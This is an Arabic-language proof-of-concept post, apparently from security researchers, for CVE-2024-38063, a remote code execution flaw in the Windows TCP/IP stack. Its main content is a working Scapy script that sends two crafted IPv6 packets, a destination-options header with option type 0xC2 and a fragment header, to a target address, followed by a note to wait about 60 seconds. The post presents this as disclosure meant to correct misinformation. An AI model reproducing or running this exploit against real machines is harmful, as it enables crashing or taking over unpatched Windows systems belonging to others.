
إثبات مفهوم لاستغلال CVE-2024-38063، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في TCP/IP بنظام ويندوز يتم تفعيلها عن طريق إرسال حزمتي IPv6 مُصممتين بعناية تحتويان على خيارات الوجهة وترويسات التجزئة.
في أغسطس 2024، أصدرت مايكروسوفت تصحيحًا لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في TCP/IP لنظام ويندوز. نشر بعض الباحثين بالفعل إثباتات المفهوم (PoC) لهذه الثغرة، وفي الوقت نفسه تقريبًا، أكمل باحثو PatchPoint تحليلهم وإعادة إنتاج هذه المشكلة. بسبب انتشار المعلومات المضللة عبر منصات متعددة، بما في ذلك تويتر، يبدو أن النقاط الحرجة المطلوبة لاستغلال هذه الثغرة قد أُسيء فهمها. وعلى عكس هذه الأخطاء، قررنا إصدار إثبات مفهوم (PoC) يوضح كيف يمكن استغلال هذه الثغرة بإرسال حزمتين فقط؛ في الواقع، ليس من الضروري إرسال عدد كبير من الحزم لاستغلال هذه الثغرة.
from scapy.all import *
IPAddr = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)

※ لاستغلال الثغرة، يلزم انتظار حوالي 60 ثانية